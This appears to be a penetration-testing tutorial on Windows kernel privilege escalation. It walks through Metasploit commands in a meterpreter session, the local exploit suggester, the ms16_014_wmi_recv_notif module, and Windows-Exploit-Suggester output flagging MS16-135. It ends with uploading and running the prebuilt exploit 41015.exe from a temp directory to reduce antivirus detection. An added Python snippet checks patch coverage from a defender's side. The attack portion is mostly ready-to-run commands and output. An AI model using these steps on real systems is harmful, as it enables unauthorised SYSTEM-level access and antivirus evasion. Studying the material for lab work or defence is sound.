Win Kernel Privesc
Get access to the target and obtain a meterpreter session, then follow the technique below.
# Local Privilege Escalation

From the meterpreter session, list the privileges the current token holds and try the built-in escalation:

```
# From the meterpreter session
getprivs

Enabled Process Privileges
==========================

Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege

getsystem

[-] priv_elevate_getsystem: Operation failed: 691 The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
[-] Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)
```

`getsystem` fails: the token holds only two low-value privileges, so the named-pipe impersonation and token-duplication techniques, which need privileges such as `SeImpersonatePrivilege` or `SeDebugPrivilege`, all fall through.
## Enumerate Windows kernel vulnerabilities with Metasploit

Background the session and run the local exploit suggester against it:

```
background
search suggester
use post/multi/recon/local_exploit_suggester
sessions
set SESSION 7
run
```

For example, the suggester may report `ms16_014_wmi_recv_notif` (Windows WMI Receive Notification Exploit), a module that exploits an uninitialized stack variable in the WMI subsystem of ntoskrnl. Run it against the same session:

```
use exploit/windows/local/ms16_014_wmi_recv_notif
set SESSION 7
set LPORT 4422
exploit
```

By using a kernel exploit for this specific version of the Windows OS, the attacker is able to get a meterpreter session with elevated privileges.
# Manual Privilege Escalation

## Windows-Exploit-Suggester

Open a terminal in a Kali VM, fetch Windows-Exploit-Suggester and update its bulletin database:

```bash
mkdir Windows-Exploit-Suggester
cd Windows-Exploit-Suggester
wget https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/f34dcc186697ac58c54ebe1d32c7695e040d0ecb/windows-exploit-suggester.py
# ^^ This is a python3 version of the script
python ./windows-exploit-suggester.py --update
[*] initiating winsploit version 3.3...
[+] writing to file 2023-03-15-mssb.xls
[*] done
pip install xlrd --upgrade
```

Use https://cloudconvert.com/xlsx-to-xls to convert the `2023-03-15-mssb.xls` file to `.xlsx` and back to `.xls`.

Run the script against the database and the saved `systeminfo` output from the target:

```bash
python ./windows-exploit-suggester.py --database 2023-03-15-mssb.xls --systeminfo win2008r2-systeminfo.txt
```

Among the results, MS16-135 is flagged as missing:

```
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*]   https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*]   https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*]   https://github.com/tinysec/public/tree/master/CVE-2016-7255
```
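The suggester's core check is a comparison of the host's installed KB list against the bulletin database. The following added example (not part of the original page or of Windows-Exploit-Suggester) reproduces that check from a defender's side: it parses the Hotfix(s) section of a `systeminfo` dump and reports bulletins for which neither the fix nor a superseding rollup is present. The `systeminfo` sample and the KB ids in `PATCH_MAP` are constructed placeholders; the real mapping comes from the mssb database the script downloads.

```python
import re

# Constructed sample of `systeminfo` output (not taken from the page); only the
# fields the check reads are included.
SAMPLE_SYSTEMINFO = """\
Host Name:                 WIN2008R2-LAB
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB3020369
                           [03]: KB976902
"""

# Placeholder mapping (assumption): bulletin -> KBs that deliver the fix and
# later rollups that supersede them. MS16-135 is the bulletin the page flags
# (article 3199135); the KB9999xxx ids are stand-ins, not real update numbers.
PATCH_MAP = {
    "MS16-135": {
        "fixes": {"KB9999001", "KB9999002"},
        "superseded_by": {"KB9999003"},
    },
}

def parse_systeminfo(text):
    """Return the OS version string and the set of installed KB ids."""
    m = re.search(r"^OS Version:\s*(.+)$", text, re.MULTILINE)
    hotfixes = set(re.findall(r"\[\d+\]:\s*(KB\d+)", text))
    return {"os_version": m.group(1).strip() if m else "", "hotfixes": hotfixes}

def missing_bulletins(info, patch_map=PATCH_MAP):
    """Bulletins for which neither the fix nor a superseding rollup is installed.

    Checking supersedence matters: a host carrying only a newer cumulative
    rollup is patched, but a plain KB-list comparison would report it as
    vulnerable, a common false positive with hotfix-based suggesters.
    """
    installed = info["hotfixes"]
    return sorted(
        bulletin for bulletin, p in patch_map.items()
        if not installed & (p["fixes"] | p["superseded_by"])
    )

if __name__ == "__main__":
    info = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(info["os_version"], "installed:", sorted(info["hotfixes"]))
    print("missing:", missing_bulletins(info))
```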
Search for MS16-135 in the windows-kernel-exploits GitHub repository and read the `41015.c` C source to check that the code does what it is supposed to; in this case I will use the pre-built executable `41015.exe`.
Knowing that this specific Windows version is vulnerable to this particular exploit, proceed with the exploitation. Use the meterpreter access to upload the `41015.exe` file to a `temp` directory within the Windows OS and run it from a shell:

```
cd C:\\
mkdir temp
cd temp\\
# Reduce the likelihood of antivirus detection by using the temp directory
upload 41015.exe
shell
.\41015.exe 7
```
